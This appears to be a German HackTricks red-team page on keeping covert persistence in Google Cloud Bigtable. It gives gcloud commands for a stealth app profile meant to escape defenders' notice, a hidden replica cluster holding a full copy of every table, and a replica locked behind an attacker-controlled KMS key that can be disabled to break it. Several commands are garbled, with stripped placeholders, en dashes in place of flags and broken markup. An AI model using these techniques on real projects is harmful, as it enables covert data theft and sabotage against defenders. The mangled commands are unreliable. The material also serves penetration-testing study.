GCP - Bigtable Persistenz

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

Bigtable

Für weitere Informationen über Bigtable siehe:

GCP - Bigtable Enum

Dediziertes Angreifer-App-Profil

Berechtigungen: bigtable.appProfiles.create, bigtable.appProfiles.update.

Erstelle ein App-Profil, das den Traffic zu deinem Replica-Cluster weiterleitet, und aktiviere Data Boost, damit du niemals von bereitgestellten Knoten abhängig bist, die Verteidiger bemerken könnten.

Erstelle stealth App-Profil ```bash gcloud bigtable app-profiles create stealth-profile \ --instance= --route-any --restrict-to= \ --row-affinity --description="internal batch"

gcloud bigtable app-profiles update stealth-profile
–instance= –data-boost
–data-boost-compute-billing-owner=HOST_PAYS

</details>

Solange dieses Profil existiert, kannst du dich mit frischen Anmeldedaten, die darauf verweisen, wieder verbinden.

### Eigenen Replikat-Cluster betreiben

**Berechtigungen:** `bigtable.clusters.create`, `bigtable.instances.update`, `bigtable.clusters.list`.

Stelle einen Cluster mit minimaler Knotenanzahl in einer unauffälligen Region bereit. Selbst wenn deine Client-Identitäten verschwinden, **behält der Cluster eine vollständige Kopie jeder Tabelle**, bis Verteidiger sie explizit entfernen.

<details>

<summary>Replikat-Cluster erstellen</summary>
```bash
gcloud bigtable clusters create dark-clone \
--instance=<instance-id> --zone=us-west4-b --num-nodes=1

Behalte es im Auge mit gcloud bigtable clusters describe dark-clone --instance=<instance-id> damit du bei Bedarf sofort hochskalieren kannst, wenn du Daten abrufen musst.

Replikation hinter deinem eigenen CMEK sperren

Berechtigungen: bigtable.clusters.create, cloudkms.cryptoKeyVersions.useToEncrypt auf dem vom Angreifer kontrollierten Schlüssel.

Bringe beim Erstellen eines Clones deinen eigenen KMS-Schlüssel mit. Ohne diesen Schlüssel kann Google den Cluster nicht neu erstellen oder einen Failover durchführen, sodass blue teams sich mit dir abstimmen müssen, bevor sie ihn anfassen.

CMEK-geschützten Cluster erstellen ```bash gcloud bigtable clusters create cmek-clone \ --instance= --zone=us-east4-b --num-nodes=1 \ --kms-key=projects//locations//keyRings//cryptoKeys/ ```

Rotiere oder deaktiviere den Schlüssel in deinem Projekt, um die Replica sofort zu bricken (du kannst ihn später wieder aktivieren).

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks